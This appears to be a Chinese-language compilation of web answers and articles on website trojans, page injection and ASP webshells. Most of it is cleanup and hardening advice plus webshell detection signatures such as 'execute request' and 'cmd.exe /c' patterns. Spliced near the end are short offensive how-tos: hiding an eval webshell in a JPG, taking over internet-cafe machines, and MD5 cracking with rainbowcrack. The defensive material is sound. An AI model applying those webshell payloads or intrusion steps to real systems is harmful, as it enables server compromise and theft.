渗透测试

网站被木马攻击

如果服务器（网站）被入侵或木马攻击了,一般都是服务器或者网站存在漏洞，被黑客利用并提权入侵的，导致服务器中木马，网站被挂黑链，被篡改，被挂马。解决办法：如果程序不是很大，可以自己比对以前程序的备份文件

，然后就是修复，或者换个服务器，最好是独立服务器。也可以通过安全公司来解决，国内也就Sinesafe和绿盟等安全公司 比较专业.

说明木马入侵的过程

这些恶意木马传播的途径大部分是利用网页挂马的形式，将恶意特征代码强行嵌入到受攻击入侵的Web网页代码中，使得计算机用户很难识别这些已经被挂马的Web网页。一旦计算机用户访问这个含有恶意代码的Web网页，操作系统就会在后台按照这段恶意代码的指令进行一系列的破坏行为。

以上是网站挂马传播的

如何防止网站被木马入侵

1.挂木马可能是一种代码，让别人打开你的网站的同时，就会超链接他事先设置好的木马上了。

2.也可能是后门，也就是别人在你的网页漏洞中添加了可以进出的一个门，这个门你自己可能都不知道。

3.是在你的网站下必要文件下安装木马，挂住你的网站，使得别人启动网站，或自己启动时中毒。

解决办法：

1.进行杀毒，看是否有实体木马存在，存在的话，杀掉它。

2.代码查看，看是否有可疑代码，有就删除它，这个比较麻烦，但专业制作网站的，也不是很难。

3.最简单的办法，用可以扫描到网站木马的软件，自己弄好网站后，打开，带扫描网页的杀毒软件可以直接扫描到你的代码存在的问题，可以根据提示删除。国内软件目前没有，国外的有，360可以知道有木马，但却无法删除，但时兴的AVAST杀毒软件可以检测出。一般人我不告诉他。

网站木马病毒入侵挂马，被注入script和eval代码，主机虚拟空间还是程序漏洞？具体如何解决？

一般都是网站程序存在漏洞或者服务器存在漏洞而被攻击了

网站挂马是每个网站最头痛的问题，解决办法：1.在程序中很容易找到挂马的代码，直接删除，或则将你没有传服务器的源程序覆盖一次但反反复复被挂就得深入解决掉此问题了。但这不是最好的解决办法。最好的方法还是找专业做安全的来帮你解决掉

听朋友说 SineSafe 不错 你可以去看看。

清马+修补漏洞=彻底解决

所谓的挂马，就是黑客通过各种手段，包括SQL注入，网站敏感文件扫描，服务器漏洞，网站程序0day, 等各种方法获得网站管理员账号，然后登陆网站后台，通过数据库 备份/恢复 或者上传漏洞获得一个webshell。利用获得的webshell修改网站页面的内容，向页面中加入恶意转向代码。也可以直接通过弱口令获得服务器或者网站FTP，然后直接对网站页面直接进行修改。当你访问被加入恶意代码的页面时，你就会自动的访问被转向的地址或者下载木马病毒

清马

1、找挂马的标签，比如有script language="javascript" src="网马地址"/script或iframe width=420 height=330 frameborder=0

scrolling=auto src=网马地址/iframe，或者是你用360或病杀毒软件拦截了网马网址。SQL数据库被挂马，一般是JS挂马。

2、找到了恶意代码后，接下来就是清马，如果是网页被挂马，可以用手动清，也可以用批量清，网页清马比较简单，这里就不详细讲，现在着重讲一下SQL数据库清马，用这一句语句“update 表名 set 字段名=replace(字段名,'aaa','')”， 解释一下这一句子的意思：把字段名里的内容包含aaa的替换成空，这样子就可以一个表一个表的批量删除网马。

在你的网站程序或数据库没有备份情况下，可以实行以上两步骤进行清马，如果你的网站程序有备份的话，直接覆盖原来的文件即可。

修补漏洞（修补网站漏洞也就是做一下网站安全。）

1、修改网站后台的用户名和密码及后台的默认路径。

2、更改数据库名,如果是ACCESS数据库，那文件的扩展名最好不要用mdb，改成ASP的，文件名也可以多几个特殊符号。

3、接着检查一下网站有没有注入漏洞或跨站漏洞，如果有的话就相当打上防注入或防跨站补丁。

4、检查一下网站的上传文件，常见了有欺骗上传漏洞，就对相应的代码进行过滤。

5、尽可能不要暴露网站的后台地址，以免被社会工程学猜解出管理用户和密码。

6、写入一些防挂马代码，让框架代码等挂马无效。

7、禁用FSO权限也是一种比较绝的方法。

8、修改网站部分文件夹的读写权限。

9、如果你是自己的服务器，那就不仅要对你的网站程序做一下安全了，而且要对你的服务器做一下安全也是很有必要了！

木马入侵主要手段

木马,全称特洛伊木马（Trojan horse），这个词语来源于古希腊神话，在计算机领域是一种客户/服务器程序，是黑客最常用的基于远程控制的工具。目前，比较有名的国产木马有：“冰河”、“广外女生”、“黑洞”、“黑冰”等；国外有名的木马则有：“SubSeven”、“Bo2000(Back Orifice)”、“NetSpy”、“Asylum”等。木马对计算机系统和网络安全危害相当大，因此，如何防范特洛伊木马入侵成为了计算机网络安全的重要内容之一。

1 木马的实现原理及特征

1.1 木马的实现原理

从本质上看，木马都是网络客户/服务模式，它分为两大部分,即客户端和服务端。其原理是一台主机提供服务(服务器) ,另一台主机接受服务(客户机),作为服务器的主机一般会打开一个默认的端口进行监听。如果有客户机向服务器的这一端口提出连接请求,服务器上的相应程序就会自动运行,来应答客户机的请求。这个程序被称为守护进程。

当攻击者要利用木马进行网络入侵，一般都要完成“向目标主机传播木马”，“启动和隐藏木马”，“建立连接”，“远程控制”等环节。

1.2 木马的特征

一个典型的木马程序通常具有以下四个特征：隐蔽性、欺骗性、顽固性和危害性。

(1)隐蔽性：隐蔽性是木马的生命力，也是其首要特征。木马必须有能力长期潜伏于目标机器中而不被发现。一个隐蔽性差的木马往往会很容易暴露自己，进而被杀毒（或杀马）软件，甚至用户手工检查出来，这样将使得这类木马变得毫无价值。木马的隐蔽性主要体现在以下两方面：

a.不产生图标。木马虽然在系统启动时会自动运行，但它不会在“任务栏”中产生一个图标。

b.木马自动在任务管理器中隐藏或者以“系统服务”的方式欺骗操作系统。这也就使得要及时了解是否中了木马带来了一定的困难。

(2)欺骗性：木马常常使用名字欺骗技术达到长期隐蔽的目的。它经常使用常见的文件名或扩展名，如dll、win、sys、explorer等字样，或者仿制一些不易被人区别的文件名，如字母“l”与数字“1”、字母“o”与数字“0”，常常修改几个文件中的这些难以分辨的字符，更有甚者干脆就借用系统文件中已有的文件名，只不过它保存在不同路径之中而已。

(3)顽固性：很多木马的功能模块已不再是由单一的文件组成，而是具有多重备份，可以相互恢复。当木马被检查出来以后，仅仅删除木马程序是不行的，有的木马使用文件关联技术，当打开某种类型的文件时，这种木马又重新生成并运行。

(4)危害性：当木马被植入目标主机以后，攻击者可以通过客户端强大的控制和破坏力对主机进行操作。比如可以窃取系统密码，控制系统的运行，进行有关文件的操作以及修改注册表等。

2 木马入侵手段

木马能不能完全发挥它的功能和作用，关键一步就是能否成功地进入到目标主机。随着网络知识的普及以及网络用户安全意识的提高，木马的入侵手段也随着发生了许多变化。

2.1木马的传统入侵手段

所谓传统入侵手段就是指大多数木马程序采取的、已经广为人知的传播方式，主要有以下几种：

1)电子邮件（E-mail）进行传播：攻击者将木马程序伪装成E-mail附件的形式发送过去，收信方只要查看邮件附件就会使木马程序得到运行并安装进入系统。

2)网络下载进行传播：一般的木马服务端程序都不是很大，最大也不超过200K，有的甚至只有几K。如果把木马捆绑到其它正常文件上，是很难发现的。一些非正规的网站以提供软件下载为名，将木马捆绑在软件安装程序上，下载后，只要运行这些程序，木马就会自动安装。通过Script、ActiveX及Asp、Cgi交互脚本的方法传播：由于微软的浏览器在执行Script脚本上存在一些漏洞，攻击者可以利用这些漏洞传播病毒和木马，甚至直接对浏览者主机进行文件操作等控制。如果攻击者有办法把木马服务端程序上载到目标主机的一个可执行WWW目录夹里面，他就可以通过编制Cgi程序在被攻击的目标主机上执行木马程序。

3)网页浏览传播：这种方法利用Java Applet编写出一个HTML网页，当我们浏览该页面时，Java Applet会在后台将木马程序下载到计算机缓存中，然后修改注册表，使指向木马程序。

4)利用系统的一些漏洞进行传播：如微软著名的IIS服务器溢出漏洞，通过一个IISHACK攻击程序即可把IIS服务器崩溃，并且同时在受控服务器执行木马程序。

5)远程入侵进行传播：黑客通过破解密码和建立IPC$远程连接后登陆到目标主机，将木马服务端程序拷贝到计算机中的文件夹（一般在C:\WINDOWS\system32或者C:\WINNT\system32）中，然后通过远程操作让木马程序在某一个时间运行。

2.2 木马入侵手段的发展

以上的木马入侵手段虽然使用广泛，但也很容易引起用户的警觉，所以一些新的入侵手段也相继出现，主要有：

1) 基于DLL和远程线程插入的木马植入

这种传播技术是以DLL的形式实现木马程序，然后在目标主机中选择特定目标进程（如系统文件或某个正常运行程序），由该进程将木马DLL植入到本系统中。

DLL文件的特点决定了这种实现形式的木马的可行性和隐藏性。首先，由于DLL文件映像可以被映射到调用进程的地址空间中，所以它能够共享宿主进程（调用DLL的进程）的资源，进而根据宿主进程在目标主机的级别未授权地访问相应的系统资源。其次，因为DLL没有被分配独立的进程地址空间，也就是说DLL的运行并不需要创建单独的进程，所以从系统的进程列表里看不见DLL的运行踪迹，从而可以避免在目标主机中留下木马进程踪迹，因此满足了隐蔽性的要求。将木马程序以DLL的形式实现后，需要使用插入到目标进程中的远程线程将该木马DLL插入到目标进程的地址空间，即利用该线程通过调用Load Library函数来加载木马DLL，从而实现木马的传播。

2)利用蠕虫病毒传播木马

以前的木马传播大都比较被动，而使用E-mail传播效率又太低，系统漏洞很快又被打上补丁，所以在某种程度上限制了木马的传播能力。网络蠕虫病毒具有很强的传染性和自我复制能力，将木马和蠕虫病毒结合在一起就可以大大地提高木马的传播能力。结合了蠕虫病毒的木马利用病毒的特性，在网络上大批量地进行传播、复制，这就加快了木马的传播速度，扩大了其传播范围。

3 木马的防范措施

为了减少或避免木马给主机以及网络带来危害，我们可以从两方面来有效地防范木马：使用防火墙阻止木马入侵以及及时查杀入侵后的木马。

防火墙是抵挡木马入侵的第一道门，也是最好的方式。绝大多数木马都是必须采用直接通讯的方式进行连接，防火墙可以阻塞拒绝来源不明的TCP数据包。防火墙的这种阻塞方式还可以阻止UDP、ICMP等其它IP数据包的通讯。防火墙完全可以进行数据包过滤检查，在适当规则的限制下，如对通讯端口进行限制，只允许系统接受限定几个端口的数据请求,这样即使木马植入成功,攻击者也是无法进入到你的系统,因为防火墙把攻击者和木马分隔开来了。但是，仍然有一些木马可以绕过防火墙进入目标主机（比如反弹端口木马），还有一些将端口寄生在合法端口上的木马，防火墙对此也无能为力。因此，我们必须要能迅速地查杀出已经入侵的木马。木马的查杀,可以采用自动和手动两种方式。最简单的删除木马的方法是安装杀毒软件,现在很多杀毒软件能删除网络上最猖獗的木马。但是，由于杀毒软件的升级多数情况下慢于木马的出现,因此学会手工查杀非常必要。方法是：

1)检查主机开放的端口

木马进行通讯时大都会开启一个通讯端口，这个端口一般是用户不常见的。检查端口可以使用专门的端口扫描器，也可以在“命令行提示符”下使用“net stat –an”命令进行查看，如图1所示。除了服务器默认使用的端口外，其它的开放端口都要引起警觉。

因为在注册表中可以设置一些启动加载项目，所以很多木马程序都会利用注册表来启动自己。事实上，只要是Run\RunOnce\RunonceEx\RunServices\RunServicesOnce等都是木马程序加载的入口，如HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current Version\Run或Run Once；HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Current Version\Run或Run Once或Run Services或RunServicesOnce。检查这些键值下是否有可疑的文件名，如果有，先关闭其进程，再删除键值和相应的应用程序。 对于一些文本(.txt)文件关联木马（比如“冰河”）和应用程序(.exe)文件关联木马（比如“广外女生”），除了以上步骤外，还要将HKEY_Classes_ROOT\txtfile\shell\open\command中的键值改为“c：\windows\notepad.exe %1”以及将HKEY_Classes_ROOT\exefile\shell\open\command中的键值改为“”%1” %*”。

3)检查启动组

虽然木马隐藏在启动组并不是十分安全，但这里的确是自动加载运行的好场所，因此还是有木马在这里驻留。启动组对应的文件夹为“C:\Documents and Settings\All Users\「开始」菜单\程序\启动”，要经常检查这个地方。

除了以上防范措施外，用户上网时应该避免访问一些非正规的网站或者下载文件；在收到带有附件的E-mail时，应该先对附件进行病毒扫描确保安全后再打开。

4 结束语

多年以来，木马与网络安全技术一直较量着，并且不断向前发展。未来的计算机木马将更注重底层的通讯编程，如针对网卡和Modem的通讯编程，这样可以有效地逃过安全检测，对网络安全形成新的威胁，我们对它的防范也将更加困难。

电脑病毒木马入侵的方式有哪些

电脑病毒入侵电脑的方法太多了。通过各种文件就入侵了。

木马病毒对电脑的危害很多的，盗取个人信息、电脑死机、蓝屏等。所以中了病毒就要马上进行杀毒。

杀毒软件一直用的是腾讯电脑管家，首先第二代引擎--鹰眼杀毒引擎，大大减少了占用的系统空间，而且支持64种病毒、木马的查杀。比较全面、彻底。

打开电脑管家/闪电杀毒/全盘扫描/完成。杀毒后重启电脑，因为很多病毒要重启电脑之后才能清除干净。

中毒后，电脑经常会出现无法正常开机的情况下，重启电脑的时候，一直按着按F8不放，进入高级选项，然后从网络安全模式进入电脑系统。开机后的第一件事就是马上进行杀毒处理。

什么是asp木马，入侵这是用他控制网站还是控制普通用户？

ASP木马猖獗，基于ASP的网站时时处于危险之中，要让网站的安全随时得到保障，需要我们的服务器管理员要做些什么呢，如何防范ASP木马呢？要防范ASP木马，那么我们就需要知道它的运行原理和机制，下面我们看一段代码：

Set oscript = Server.CreateObject("Wscript.SHELL") ”建立了一个名为oscript的Wscript.SHELL对象，用于命令的执行”

Set oscriptNet = Server.CreateObject("Wscript.NETWORK")

Set oFileSys = Server.CreateObject("scripting.FileSystemObject")

上面三行代码创建了Wscript.SHELL、Wscript.NETWORK、scripting.FileSystemObject三个对象我们可以看出asp木马的运行原理就是通过调用组件对象等完成的。

通过分析一些asp木马，我们看出主要是通过3个组件运行的，第一个是我们都知道的FSO, 需要FSO支持也就是"scripting.FileSystemObject"项的支持,那么有人会说，是不是删除这个组件就可以了呀 ，不可以的，因为现在很多程序都是要用到FSO这个组件的，所以是觉得不能限制的，不然正常的程序也运行不了，现在网上有很多教程，告诉别人删除或限制使用，这些方法都很极端，我不推荐大家使用，我们再说另外几个组件"shell.application"、"Wscript.SHELL"等危险组件 ，一般的木马都是要使用这几个组件的 ，即使你把fso组件限制的话，你不去限制别的组件的的话，一样不能起到效果的，对于fso组件之外的其他的几个组件，我们平时是不太用的，所以我们可以直接在注册表中的HKEY_CLASSES_ROOT中找到

找到"shell.application"、"Wscript.SHELL"等危险的脚本对象（因为它们都是用于创建脚本命令通道的）进行改名或删除，也就是限制系统对“脚本SHELL”的创建，ASP木马也就成为无本之木、无米之炊，运行不起来了。如果我们自己要使用的话，那么我们就不要删除直接改下名字，如果是改名，要改得复杂一点，不要让别人猜到了，我们在要用的程序里面直接把调用的名字改成我们刚才修改的名字就可以了。

对组件进行限制之后，我们还应该对服务器的权限进行严格的设置，这里我就不说了，由于篇幅问题，等下不知道要写多久了，大家可以参考网上的一些安全权限设置， 我们对权限和组件等等设置完了之后，基本上就能防止asp木马的危害了。

另外有一点应该注意，如果确实发现木马了，查杀完之后，应该将具有管理权限的各类帐号都进行修改。包括论坛的帐号、数据库帐号以及服务器操作系统帐号、FTP 帐号等，如果我们做到了这个几点话，我们的服务器基本上是安全了，呵呵，为什么说是基本的呢，因为这个世界上根本就没有安全的服务器了，只不过我们刚才说到的设置只是能够防范大部分asp木马的的侵害，不排除一些别的因素，比如说提限。说白了防范asp木马就是要限制组件，设置严格的权限和保证asp程序的安全

我们下面说下怎么样查杀asp木马了，我根据自己的一些经验说几种方法

1. 时间比较法

按时间顺序找到最近被改动的asp文件 ，打开看下，是不是木马呢，什么，看不懂代码, 那你就把不是你自己放的asp文件，名字看一眼就看的出的。比如说diy.ap.dm6.asp,angel.asp.shell.asp什么的文件，可疑的asp文件不是你自己创建的删除，或直接访问下看下是不是木马就可以了

2. 查找关键字，asp木马都是有关键字的，也就像病毒的特征码，我们用windows自带的搜索功能就能查找到 ，查找包含内容为关键字的所有文件就可以了，找到以后看下就可以了，有时候能查找到一些asp的大文件，如果是虚拟主机的话，一般是数据库文件改成asp的了，如果是一句话木马的关键字就小心了，如果是大型木马的关键字，咱们访问一下看看，我不赞成把数据库改成asp的，至于为什么，大家都知道吧。

我整理了一些特征码，现在给大家

gxgl

lcx

script ****************equest.form(’#’)+’’)/script

输入马的内容

session("b")

request("kker")

非常遗憾,您的主机不支持ADODB.Stream,不能使用本程序

传至服务器已有虚拟目录

警告:对非法使用此程序可能带来的任何不良后果责任自负!请勿用于非法用途!!!

%execute request("value")%

ccopus

%execute(request("＃"))%

script ******************if reques(＃")"" then execute(request("＃"))/script

("cmd.exe /c "request.form("cmd")).

("cmd.exe /c "request("cmd")).

("cmd.exe /c "request("c")).

这些都是关键字了，全部是我从木马里面一个一个提取出来的，如果有这些特征的话，一般都是木马 ，不过大家最好打开看一下,不排除特殊情况。如果你的网站里，有类似代码：******************com" /iframe 估计可能是被加入的恶意连接，或着被挂马了，好狠毒，那么请在关键词中搜索iframe src，

3. 大家也可以用明小子的asp木马扫描的这个小工具拉，把我的关键字放进去，扫描一下，挺方便的，呵呵

4. 在网站结构清楚的情况下，浏览目录法能快速确定木马，在不该出现的地方出现的文件，管他是不是木马都可以删，比如说dvbbs下的 upfile这些文件夹里是不应该出现asp文件的，我们一发现就删除就是了 ，不过要求管理员对自己的网站目录结构熟

5. 有一种方法可以试下，就是做好备份，一旦发现有人入侵，马上还原，这样什么木马也不怕了，不过要注意的是，把保证备份文件是安全的 ，要是备份文件里也有木马，让就没搞一样的

6. 用asp木马追捕的文件，查杀，网上有下载的，另外我们常用的杀毒软件也有这样的功能，我推荐大家采用卡巴斯机，效果非常好，几乎能查杀如今所有流行的asp木马

上面只是简单的介绍了一下，asp木马的一些查杀方法，当然这些只是亡养补牢了，我们最好对服务器系统进行严格的权限限制，让黑客即使是上传了木马也没有什么用，这里权限的限制我就不多说了等下不知道要写多少，网上的资料也很全面的，大家可以自己去查找西。而且现在说来说去，asp木马的隐藏方法确实是很高明，asp木马代码加密，图片合并，文件时间修改，还有要命的系统漏洞利用等等这对于要百分之百查杀asp木马的查杀，几乎不可能，我们只有堵住木马上传的源头 ，asp程序尽量用最新版本，网站中的上传途径自己应该特别注意，对于不需要脚本运行的文件夹在iis里面设置，执行许可为无，还有就是管理员要求有良好的安全意识，不然的话，谈不上安全了，并且我们设置了权限之后， 传了也是白传。

它和其他asp程序没有本质区别，只要是能运行asp的空间就能运行它，这种性质使得asp木马非常不易被发觉。它和其他asp程序的区别只在于asp木马是入侵者上传到目标空间，并帮助入侵者控制目标空间的asp程序。

关于制作..

建一个asp文件，内容为 !--＃i ****** .jpg"--

找一个正常图片ating.jpg，插入一句话木马（比如冰狐的）,用ultraedit进行hex编译，插入图片里，为了运行成功，还要搜索%和％,将其变为00,(不要替换自己asp的),再把jpg文件开头加入

SCRIPT ****** eval(Request.form(#)+) /SCRIPT

2. 名称：整蛊网吧

先用精锐网吧辅助工具得到用户名和密码，然后用计算机管理联结一台机器，开telnet,连接，开共享，复制一个木马过去运行即可。 3．名称：感受MD5暴力破解的魅力

rainbowcrack用法先用rtgen生成库 "******1 7 5 2400 40000 all"

1和7代表密码最小和最大长度

阿汀我再加个方法：http://md5.r*****e.com/ 在线破解

由于ASP它本身是服务器提供的一项服务功能，特别是最近由dvbbs的upfile文件出现漏洞以来，其高度的隐蔽性和难查杀性，对网站的安全造成了严重的威胁。因此针对ASP木马的防范和清除，为网管人员提出了更高的技术要求.

几个大的程序全部被发现存在上传漏洞，小程序更是不计其数，让asp木马一下占据了主流，得到广泛的使用，想必如果你是做服务器的话，一定为此头疼不止吧，特别是虚拟主机的用户都遇到过网页被篡改、数据被删除的经历，事后除了对这种行径深恶痛绝外，许多客户又苦于没有行之有效的防范措施。鉴于大部分网站入侵都是利用asp木马完成的，特写此文章以使普通虚拟主机用户能更好地了解、防范asp木马。也只有空间商和虚拟主机用户共同做好防范措施才可以有效防范asp木马!

我们首先来说一下怎么样防范好了，说到防范我们自然要对asp木马的原理了，大道理我也不讲了，网上的文章有的是，简单的说asp木马其实就是用asp编写的网站程序，甚至有些asp木马就是由asp网站管理程序修改而来的。就比如说我们常见的asp站长助手，等等

它和其他asp程序没有本质区别，只要是能运行asp的空间就能运行它，这种性质使得asp木马非常不易被发觉。它和其他asp程序的区别只在于asp木马是入侵者上传到目标空间，并帮助入侵者控制目标空间的asp程序。严重的从而获取服务器管理员的权限，要想禁止asp木马运行就等于禁止asp的运行，显然这是行不通的，这也是为什么asp木马猖獗的原因!有人要问了，是不是就没有办法了呢，不，有办法的：

第一：从源头入手，入侵者是怎么样上传asp木马的呢？一般有几种方法，通过sql注射手段，获取管理员权限，通过备份数据库的功能将asp木马写入服务器。或者进入后台通过asp程序的上传功能的漏洞，上传木马等等，当然正常情况下，这些可以上传文件的asp程序都是有权限限制的，大多也限制了asp文件的上传。(比如：可以上传图片的新闻发布、图片管理程序，及可以上传更多类型文件的论坛程序等)，如果我们直接上传asp木马的话，我们会发现，程序会有提示，是不能直接上传的，但由于存在人为的asp设置错误及asp程序本身的漏洞，给了入侵者可乘之机，实现上传asp木马。

因此，防范asp木马的重点就在于虚拟主机用户如何确保自己空间中asp上传程序的安全上，如果你是用别人的程序的话，尽量用出名一点的大型一点的程序，这样漏洞自然就少一些，而且尽量使用最新的版本，并且要经常去官方网站查看新版本或者是最新补丁，还有就是那些数据库默认路径呀，管理员密码默认呀，一定要改，形成习惯保证程序的安全性。

那么如果你是程序员的话，我还想说的一点就是我们在网站程序上也应该尽量从安全的角度上编写涉及用户名与口令的程序最好封装在服务器端，尽量少的在ASP文件里出现，涉及到与数据库连接地用户名与口令应给予最小的权限; 需要经过验证的ASP页面，可跟踪上一个页面的文件名，只有从上一页面转进来的会话才能读取这个页面。防止ASP主页.inc文件泄露问题; 防止UE等编辑器生成some.asp.bak文件泄露问题等等特别是上传功能一定要特别注意

上面的只是对客户的一些要求，但是空间商由于无法预见虚拟主机用户会在自己站点中上传什么样的程序，以及每个程序是否存在漏洞，因此无法防止入侵者利用站点中客户程序本身漏洞上传asp木马的行为。空间商只能防止入侵者利用已被入侵的站点再次入侵同一服务器上其他站点的行为。这也更加说明要防范asp木马，虚拟主机用户就要对自己的程序严格把关! 为此我总结了ASP木马防范的十大原则供大家参考：

1、建议用户通过ftp来上传、维护网页，尽量不安装asp的上传程序。

2、对asp上传程序的调用一定要进行身份认证，并只允许信任的人使用上传程序。

这其中包括各种新闻发布、商城及论坛程序，只要可以上传文件的asp都要进行身份认证!

3、asp程序管理员的用户名和密码要有一定复杂性，不能过于简单，还要注意定期更换。

4、到正规网站下载asp程序，下载后要对其数据库名称和存放路径进行修改，数据库文件名称也要有一定复杂性。建议我公司的客户使用.mdb的数据库文件扩展名，因为我公司服务器设置了.mdb文件防下载功能。

5、要尽量保持程序是最新版本。

6、不要在网页上加注后台管理程序登陆页面的链接。

7、为防止程序有未知漏洞，可以在维护后删除后台管理程序的登陆页面，下次维护时再通过ftp上传即可。

8、要时常备份数据库等重要文件。

9、日常要多维护，并注意空间中是否有来历不明的asp文件。记住：一分汗水，换一分安全!

10、一旦发现被入侵，除非自己能识别出所有木马文件，否则要删除所有文件。

重新上传文件前，所有asp程序用户名和密码都要重置，并要重新修改程序数据库名称和存放路径以及后台管理程序的路径。

做好以上防范措施，您的网站只能说是相对安全了，决不能因此疏忽大意，因为入侵与反入侵是一场永恒的战争